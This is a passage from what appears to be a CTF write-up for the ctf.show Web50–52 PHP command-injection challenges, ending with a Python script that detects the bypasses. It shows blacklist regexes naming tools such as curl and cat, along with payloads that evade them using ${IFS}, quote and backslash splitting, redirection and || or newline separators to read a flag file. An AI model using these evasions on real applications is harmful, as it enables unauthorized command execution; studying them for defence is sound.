?c=nl<fla\g.php%0a

Official hint:

nl<fla''g.php||

Web50

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:32:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

Same as the previous few challenges (the tab and & are now filtered too, so the newline and || separators remain):

?c=tac<fla''g.php||
?c=nl<>fla\g.php||

Official hint:

nl<fla''g.php||

Web51

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:42:52
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

Still the same, except that tac is now filtered, so nl is used:

?c=nl<fla''g.php||
?c=nl<>fla\g.php||

Official hint:

nl<fla''g.php||

Web52

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:50:30
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

Compared with the previous challenges, $ is no longer filtered but < and > are; the flag is at /flag. With $ allowed again, ${IFS} can replace the space.

Payload:

?c=nl${IFS}/fl\ag||
?c=nl${IFS}/fl''ag||

Official hint:

nl$IFS/fla''g||
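Web42 through Web52 all pass $_GET['c'] to system() behind a blacklist regex, and each payload above evades the regex with a shell rewrite: a %0a newline or || in place of the semicolon, ${IFS} in place of a space, fla''g or fl\ag in place of flag. The following Python script is an added example, not from the original post or from ctf.show, that shows the defender's side of that series: it URL-decodes the parameter as PHP would, applies the Web52 regex to the decoded string, then rewrites the string the way the shell will interpret it and inspects the result. The sample inputs are constructed from the payload shapes above, and the allowlist of permitted binaries is a hypothetical one chosen for the example.

```python
import re
from urllib.parse import unquote

# Constructed inputs, as they would arrive in $_GET['c'] (still URL-encoded
# where the writeup encodes them). Keys name the challenge whose payload
# shape the value copies; "benign" is what a legitimate caller might send.
SAMPLES = {
    "benign": "ls",
    "web42": "cat flag.php;",
    "web43": "tac%20flag.php%0a",
    "web45": "tac${IFS}$1fla*.php%0a",
    "web46": "nl<fla''g.php||",
    "web49": "tac<>fla%27%27g.php%0a",
    "web52": "nl${IFS}/fl\\ag||",
}

# The Web52 blacklist from the challenge source; PHP applies it to the
# already URL-decoded parameter.
WEB52_FILTER = re.compile(
    r"\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\<",
    re.IGNORECASE,
)

# Shell rewrites that a blacklist on the raw string never sees.
IFS_RE = re.compile(r'\$\{IFS\}|\$IFS|\t')         # ${IFS}, $IFS and tab all separate words
POSITIONAL_RE = re.compile(r'\$\d')                # $1 … $9 expand to nothing in the server's shell
EMPTY_QUOTES_RE = re.compile(r"''|\"\"")           # fla''g -> flag
BACKSLASH_RE = re.compile(r'\\(.)')                # fl\ag  -> flag (an unquoted \x is just x)
REDIRECT_RE = re.compile(r'<>|<|>')                # nl<flag.php runs nl with stdin from flag.php
SEPARATOR_RE = re.compile(r'\n|;|\|\||&&|\||&|`|\$\(')  # anything that ends the first command
GLOB_RE = re.compile(r'[*?\[]')

# Hypothetical allowlist for an application that only ever needs these binaries.
ALLOWED = {'ls', 'pwd', 'id'}


def normalize(decoded):
    """Rewrite the decoded parameter into the form the shell will actually run."""
    s = IFS_RE.sub(' ', decoded)
    s = POSITIONAL_RE.sub('', s)
    s = EMPTY_QUOTES_RE.sub('', s)
    s = BACKSLASH_RE.sub(r'\1', s)
    s = REDIRECT_RE.sub(lambda m: f' {m.group(0)} ', s)
    return re.sub(r' +', ' ', s).strip(' ')


def split_commands(normalized):
    """Split on every separator; the appended '>/dev/null 2>&1' only binds to the last piece."""
    return [c.strip() for c in SEPARATOR_RE.split(normalized) if c.strip()]


def first_word(command):
    """The binary a command invokes, skipping leading redirection operators."""
    for tok in command.split():
        if tok not in ('<', '>', '<>'):
            return tok
    return ''


def analyze(raw):
    """Compare the raw-string blacklist with inspection after shell-style normalization."""
    decoded = unquote(raw)
    normalized = normalize(decoded)
    commands = split_commands(normalized)
    reasons = []
    if SEPARATOR_RE.search(normalized):
        reasons.append('command-separator')
    if 'flag' in normalized.lower():
        reasons.append('flag-reference')
    if GLOB_RE.search(normalized):
        reasons.append('glob-wildcard')
    for command in commands:
        word = first_word(command)
        if word and word not in ALLOWED:
            reasons.append(f'binary:{word}')
    return {
        'decoded': decoded,
        'normalized': normalized,
        'commands': commands,
        'blacklist_hit': bool(WEB52_FILTER.search(decoded)),
        'reasons': reasons,
    }


def analyze_all(samples=SAMPLES):
    return {name: analyze(raw) for name, raw in samples.items()}


if __name__ == '__main__':
    for name, result in analyze_all().items():
        print(f"{name:7} blacklist={result['blacklist_hit']!s:5} "
              f"normalized={result['normalized']!r} reasons={result['reasons']}")
```

For nl${IFS}/fl\ag|| the Web52 regex does not fire, while the normalized form nl /flag|| exposes both the file name and the || separator; the earlier payloads are all caught by the Web52 regex, which is exactly why the series kept adding terms. The practical lesson is that a blacklist on the raw string cannot keep up with shell rewriting; the safer design is an allowlist of complete commands, or passing arguments to the program without a shell, applied after normalization.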